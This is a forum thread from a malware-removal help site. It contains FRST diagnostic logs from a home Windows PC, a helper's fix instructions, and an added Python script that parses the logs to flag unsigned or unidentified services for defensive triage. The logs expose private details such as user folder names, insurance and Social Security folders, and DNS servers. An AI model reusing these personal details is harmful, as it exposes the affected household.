2014-10-25 09:36 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-25 09:33 - 2011-07-14 16:07 - 01555283 _____ () C:\Windows\WindowsUpdate.log
2014-10-25 08:50 - 2013-09-03 19:55 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-22 23:12 - 2012-11-15 16:02 - 00000000 ____D () C:\Users\Greg\AppData\Local\CrashDumps
2014-10-21 21:39 - 2009-07-14 01:08 - 00032576 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-21 21:15 - 2012-08-14 20:57 - 00000000 ____D () C:\Users\Greg\Documents\Outlook Files
2014-10-21 20:46 - 2012-09-30 09:49 - 00000000 ____D () C:\Users\Greg\AppData\Local\Deployment
2014-10-21 18:57 - 2011-09-30 08:15 - 02517240 _____ () C:\Windows\PFRO.log
2014-10-21 18:04 - 2012-06-14 14:55 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-21 15:58 - 2011-12-08 09:44 - 00000000 ____D () C:\Users\Greg\AppData\Local\join.me
2014-10-21 12:24 - 2009-07-14 01:13 - 00852346 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-21 10:28 - 2012-12-08 15:01 - 00000000 ____D () C:\Program Files (x86)\Ask.com
2014-10-21 10:28 - 2011-08-25 06:57 - 00000000 ____D () C:\Firefox
2014-10-21 09:33 - 2012-10-10 09:17 - 00000000 ____D () C:\Users\Greg\Finance
2014-10-20 20:36 - 2012-10-10 07:16 - 00000000 ____D () C:\Users\Greg\DVDs
2014-10-20 19:45 - 2013-01-11 19:50 - 00000000 ____D () C:\NPE
2014-10-20 16:53 - 2011-07-14 16:35 - 00844468 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-10-20 16:51 - 2013-08-15 03:00 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-20 10:16 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\7-BOOK OF BUSINESS
2014-10-20 09:56 - 2014-04-05 16:24 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\GoodSync
2014-10-19 12:49 - 2011-07-14 16:02 - 00000000 ____D () C:\Users\Greg
2014-10-19 12:48 - 2012-10-09 22:38 - 00000000 ____D () C:\Users\Greg\Vacation
2014-10-18 11:00 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\3 INS CO LOGIN
2014-10-18 10:50 - 2012-11-07 16:05 - 00000000 ____D () C:\Users\Greg\Documents\CASE DESIGN
2014-10-18 07:22 - 2011-07-14 23:39 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-18 07:22 - 2011-07-14 23:39 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 15:26 - 2013-07-28 07:34 - 00000000 ____D () C:\Users\Greg\Documents\Retirement Planning
2014-10-17 14:21 - 2014-04-05 16:19 - 00000000 ____D () C:\Users\Greg\Robo Form
2014-10-17 11:07 - 2013-08-05 21:51 - 00000000 ____D () C:\Users\Greg\Documents\EquiTrust
2014-10-17 09:05 - 2014-05-14 08:51 - 00000000 ____D () C:\Users\Greg\Documents\Life Ins
2014-10-16 20:19 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\Advertising & Marketing
2014-10-16 17:03 - 2011-10-02 15:51 - 00002455 _____ () C:\Users\Greg\Documents\4 LEAD CO - Shortcut.lnk
2014-10-15 19:32 - 2014-02-19 17:31 - 00002102 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-15 17:38 - 2012-07-10 14:09 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-15 04:44 - 2013-01-20 11:23 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\MotoCast
2014-10-15 03:27 - 2013-01-20 11:26 - 00000000 ____D () C:\Users\Greg\.gstreamer-0.10
2014-10-14 20:52 - 2014-04-05 14:03 - 00000000 ____D () C:\Users\Greg\Documents\001 Archive Folder
2014-10-14 18:48 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\Aetna Ind Health
2014-10-14 16:30 - 2012-09-04 14:12 - 00000000 ____D () C:\Users\Greg\Documents\State Licenses
2014-10-14 13:20 - 2014-02-04 15:00 - 00003578 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3448307080-1944955064-2909665858-1000
2014-10-14 12:13 - 2012-10-09 22:24 - 00000000 ____D () C:\Users\Greg\Cars & Cycles
2014-10-14 09:45 - 2014-04-02 17:53 - 00000214 _____ () C:\Users\Greg\Desktop\LPI Policies.url
2014-10-13 16:31 - 2012-06-22 09:30 - 00000000 ____D () C:\Users\Greg\AppData\Local\Downloaded Installations
2014-10-13 15:36 - 2013-03-12 21:47 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-10-13 15:36 - 2013-03-12 21:47 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-10-13 12:47 - 2013-11-29 17:53 - 00000000 ____D () C:\Users\Greg\1 - Read
2014-10-04 09:44 - 2013-08-07 20:35 - 00003238 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-10-04 09:44 - 2013-08-07 20:34 - 00000000 ____D () C:\Windows\system32\Drivers\N360x64
2014-10-04 08:41 - 2013-04-05 13:46 - 00000294 _____ () C:\Users\Greg\Desktop\Go Daddy Email.url
2014-10-03 10:59 - 2013-03-09 09:57 - 00000000 ____D () C:\Users\Greg\Documents\01 Read
2014-10-03 10:02 - 2011-07-14 16:41 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 21:35 - 2012-08-16 21:57 - 00000000 ____D () C:\Users\Greg\Documents\Vacation
2014-10-02 05:52 - 2014-08-26 13:36 - 00000000 ____D () C:\Users\Greg\Food Storage
2014-09-30 20:37 - 2011-08-04 09:56 - 00000000 ____D () C:\Users\Greg\E-Books
2014-09-30 14:41 - 2014-09-05 14:22 - 00000000 ____D () C:\Users\Greg\Documents\Provident Trust
2014-09-30 12:09 - 2011-11-04 11:03 - 00000000 __SHD () C:\Users\Greg\Documents\cache
2014-09-30 11:00 - 2011-07-13 19:11 - 00000000 ____D () C:\Users\Greg\Documents\MEDICARE
2014-09-30 06:42 - 2014-05-09 15:09 - 00000000 ____D () C:\Users\Greg\Documents\Safe Money
2014-09-30 06:38 - 2011-09-29 10:02 - 00000000 ____D () C:\Users\Greg\Documents\Funeral Trusts - Legacy Safeguard & NGL
2014-09-30 06:31 - 2011-07-13 19:11 - 00000000 ____D () C:\Users\Greg\Documents\Client Contact List
2014-09-30 06:23 - 2014-01-29 14:09 - 00000000 ____D () C:\Users\Greg\Documents\APPS PENDING-14
2014-09-30 06:23 - 2013-12-09 18:31 - 00000000 ____D () C:\Users\Greg\Documents\HIX
2014-09-30 06:13 - 2012-07-20 12:34 - 00000000 ____D () C:\Users\Greg\Documents\ID Theft & Legal Shield
2014-09-26 12:43 - 2013-02-19 13:35 - 00000000 ____D () C:\Users\Greg\Documents\SOCIAL SECURITY

Files to move or delete:
====================
C:\Users\Greg\AppData\Roaming\skype.ini
C:\Users\Greg\AppData\Roaming\cache.ini

Some content of TEMP:
====================
C:\Users\Greg\AppData\Local\Temp\sqlite3.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite24165.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite55383.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite87103.dll
C:\Users\Greg\AppData\Local\Temp\UNINSTALL.EXE

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-16 00:49

==================== End Of Log ============================

 

Attached File  Addition.txt   33.02KB   1 downloads
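The Services and Drivers sections of the FRST log above follow a fixed line format: a state letter (R running, S stopped) and a start-type digit, the entry name, then either the image path with `[size date]` and the publisher from the file's version resource, or `No ImagePath`, with `[File not signed]` appended where the binary carries no signature. As an added example that is not part of this thread and is not FRST's own code, the following Python script parses those two sections and pulls out the entries a responder would look at first. The sample input is constructed from lines copied out of the log above; the names `START_TYPES`, `parse_frst` and `triage` are chosen here.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample input: lines copied from the FRST log posted in this thread,
# together with the section headers FRST prints. Not a full log.
SAMPLE_LOG = """\
==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 GsServer; C:\\Program Files\\Siber Systems\\GoodSync\\Gs-Server.exe [8574096 2014-03-30] ()
R2 N360; C:\\Program Files (x86)\\Norton 360 Premier Edition\\Engine\\21.6.0.32\\N360.exe [265040 2014-09-21] (Symantec Corporation)
R2 PST Service; C:\\Program Files (x86)\\Motorola\\MotForwardDaemon\\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]
S3 B-Service; No ImagePath

==================== Drivers (Whitelisted) ====================

S1 A2DDA; No ImagePath
R1 ESProtectionDriver; C:\\Program Files (x86)\\Malwarebytes Anti-Exploit\\mbae64.sys [63000 2014-08-30] ()
S3 SWDUMon; C:\\Windows\\System32\\DRIVERS\\SWDUMon.sys [16152 2014-10-25] ()
R0 SymDS; C:\\Windows\\System32\\drivers\\N360x64\\1506000.020\\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation)
"""

SECTION_RE = re.compile(r"^=+ (?P<name>.+?) =+$")
# "<R|S><start digit> <name>; <rest>"
ENTRY_RE = re.compile(r"^(?P<state>[RS])(?P<start>\d) (?P<name>[^;]+); (?P<rest>.*)$")
# "<path> [<size> <yyyy-mm-dd>] (<publisher>)[ [File not signed]]"
IMAGE_RE = re.compile(
    r"^(?P<path>.+?) \[(?P<size>\d+) (?P<date>\d{4}-\d{2}-\d{2})\] \((?P<publisher>[^)]*)\)(?P<flags>.*)$"
)

# Windows service Start values as FRST prints them after the R/S letter.
START_TYPES = {"0": "boot", "1": "system", "2": "auto", "3": "manual", "4": "disabled"}


@dataclass
class Entry:
    section: str
    state: str          # "R" running, "S" stopped
    start_type: str     # boot/system/auto/manual/disabled
    name: str
    path: Optional[str]
    publisher: Optional[str]
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_frst(text: str) -> List[Entry]:
    """Parse the Services/Drivers sections of an FRST log into Entry records."""
    entries: List[Entry] = []
    section = ""
    for line in text.splitlines():
        m = SECTION_RE.match(line.strip())
        if m:
            section = m.group("name")
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue  # blank lines and FRST's explanatory notes
        rest = m.group("rest")
        e = Entry(section, m.group("state"),
                  START_TYPES.get(m.group("start"), m.group("start")),
                  m.group("name"), None, None)
        if rest == "No ImagePath":
            # The registry key exists but points at no binary: usually a leftover
            # from an uninstalled tool, but still worth checking by hand.
            e.reasons.append("no ImagePath (orphaned registry entry)")
        else:
            im = IMAGE_RE.match(rest)
            if not im:
                e.reasons.append("unparsed image line")
            else:
                e.path = im.group("path")
                e.publisher = im.group("publisher")
                if "[File not signed]" in im.group("flags"):
                    e.reasons.append("file not signed")
                if not e.publisher:
                    # "()" means no company name in the version resource. Some
                    # legitimate tools ship that way, so this is a triage hint,
                    # not a verdict.
                    e.reasons.append("no publisher in version info")
        entries.append(e)
    return entries


def triage(text: str) -> Dict[str, List[str]]:
    """Return {entry name: [reasons]} for every service/driver worth a second look."""
    return {e.name: e.reasons for e in parse_frst(text) if e.suspicious}


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_LOG).items():
        print(f"{name}: {', '.join(reasons)}")
```

Run against the sample, the script flags `B-Service` and `A2DDA` for having no ImagePath, `PST Service` for the unsigned file, and `GsServer`, `ESProtectionDriver` and `SWDUMon` for carrying no publisher, while the Norton entries pass. The flagged list is a starting point for the helper's fixlist, not a verdict: the GoodSync server and the Malwarebytes Anti-Exploit driver are known-good products that simply lack a company name in their version resource, which is exactly why the output keeps the reason next to each name.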



#5 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  • Gender:Male
  • Location:Bulgaria
  • Local time:10:51 PM

Posted 25 October 2014 - 11:46 AM

Hello Sue,

 

Nice to meet you. :)

 

Do you know what this program is? => Tuition Savings Calculator 12-13

 

 

Next, please download the following file => and save it to the Desktop.
NOTE: It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it in your reply.

 

 

Regards,

Georgi




#6 sjk117

sjk117
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  • Local time:03:51 PM

Posted 25 October 2014 - 09:35 PM

Attached File  Fixlog.txt   5.8KB   3 downloads

 

Yes, we know that program, but no longer need it. I uninstalled it.

Ran the fixlist file as instructed above; I had to go out, so I left it running. After 6 hours, my husband decided to check it - the green progress bar was not advancing anymore; he clicked in the header of the program window and got a message that it was not responding.

 

I got home 2 hours after that - the program icon was minimized in the Taskbar; when I tried to re-open it, it would not open, and I could not close it, either. I used Task Manager to check it, it said it was not responding, so I ended it. There was a Fixlog file on the desktop, which is attached. I shut down the infected PC.

 

Also, I have noticed every time we shut down that computer, it displays a "Windows Update" message - and when it starts up again, it says it is applying updates. This machine has been disconnected from the internet for 3 days, so I don't see how it could have a Windows Update every time we power it down....

 

Awaiting next instruction.

Sue


Edited by sjk117, 25 October 2014 - 09:37 PM.


#7 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  • Gender:Male
  • Location:Bulgaria
  • Local time:10:51 PM

Posted 26 October 2014 - 04:09 AM

Hello,

 

The fix seems successful despite the error message. :)

Please restart the computer and run a new scan with Farbar Recovery Scan Tool (make sure that Addition.txt is checked before you press the Scan button) and then please post both logs in your next reply.

 

As for Windows Updates... the updates may have been downloaded but not installed yet if "Download updates but let me choose whether to install them" is selected in the Windows Update settings.

 

http://windows.microsoft.com/en-us/windows/change-windows-update-installation-notification#1TC=windows-7

 

 

 

Regards,

Georgi




#8 sjk117

sjk117
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  • Local time:03:51 PM

Posted 26 October 2014 - 07:10 AM

Attached File  Addition.txt   32.99KB   1 downloads

OK, ran FRST. Logs below and attached. OK to reconnect the computer to the internet?

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 25-10-2014
Ran by Greg (administrator) on KIBMAIN on 26-10-2014 08:01:19
Running from C:\Users\Greg\Desktop
Loaded Profile: Greg (Available profiles: Greg)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Nero AG) C:\Program Files (x86)\Motorola Media Link\Lite\NServiceEntry.exe
() C:\Program Files\Siber Systems\GoodSync\Gs-Server.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Symantec Corporation) C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccsvchst.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe
(Motorola) C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe
(Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\SeagateDashboardService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Symantec Corporation) C:\Program Files (x86)\Norton One\Engine\3.2.2.12\ccsvchst.exe
(Motorola Mobility LLC) C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperAgent.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(SlimWare Utilities, Inc.) C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe
(Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoDashboard.exe
(Axentra Corporation) C:\Program Files (x86)\Seagate\Seagate Dashboard\HipServAgent\HipServAgent.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13662936 2013-11-28] (Realtek Semiconductor)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Seagate Dashboard] => C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoLauncher.exe [79112 2011-06-01] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [BFHP] => C:\Program Files (x86)\Common Files\BeFrugal.com\Toolbar\BFHP.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM-x32\...\Run: [Malwarebytes Anti-Exploit] => C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae.exe [440632 2014-08-29] (Malwarebytes Corporation)
HKU\S-1-5-21-3448307080-1944955064-2909665858-1000\...\MountPoints2: {7304c3fd-60a8-11e2-a79a-4061869b0540} - I:\MotoCastSetup.exe -a
HKU\S-1-5-18\...\Run: [Norton Download Manager{N360P204040-SHPD-FSD33017}] => C:\Program Files (x86)\Norton One\Engine\3.2.0.19\ccSvcHst.exe /m
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.yahoo.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/?fr=befhp&type=iehp-3.13-1406
SearchScopes: HKCU - 68B8CF96730C4D55A37F7E95660E8E82 URL = https://search.yahoo.com/search?p={searchTerms}&fr=chr-gl-gen1
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {AFDBDDAA-5D3F-42EE-B79C-185A7020515B} URL =
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: RoboForm Toolbar Helper -> {724d43a9-0d85-11d4-9908-00400523e39a} -> C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> No File
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> No File
BHO-x32: RealPlayer Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll (RealPlayer)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: RoboForm Toolbar Helper -> {724d43a9-0d85-11d4-9908-00400523e39a} -> C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll (Siber Systems Inc.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - &RoboForm Toolbar - {724d43a0-0d85-11d4-9908-00400523e39a} - C:\Program Files (x86)\Siber Systems\AI RoboForm\roboform.dll (Siber Systems Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - &RoboForm Toolbar - {724D43A0-0D85-11D4-9908-00400523E39A} - C:\Program Files (x86)\Siber Systems\AI RoboForm\RoboForm-x64.dll (Siber Systems Inc.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
DPF: HKLM-x32 {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: HKLM-x32 {119CE688-A7E9-1941-8E10-F42990BBA4C4} https://fiserv.assurity.com/reports/control/ASRrptview.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://turborater.webex.com/client/WBXclient-T28L10NSP8EP1-15699/nbr/ieatgpc1.cab
Tcpip\Parameters: [DhcpNameServer] 216.144.187.199 24.229.54.212 204.186.80.229

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1167637.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @real.com/nppl3260;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprjplug;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprjplug.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpchromebrowserrecordext;version=15.0.4.53 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprpchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprphtml5videoshim;version=15.0.4.53 -> C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\MozillaPlugins\nprphtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=15.0.4.53 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Greg\AppData\Local\Citrix\Plugins\79\npappdetector.dll (Citrix Online)
FF Extension: Word Layers - C:\Program Files (x86)\Mozilla Firefox\extensions\ugnraew@jqhljqmpngx.net [2013-10-16]
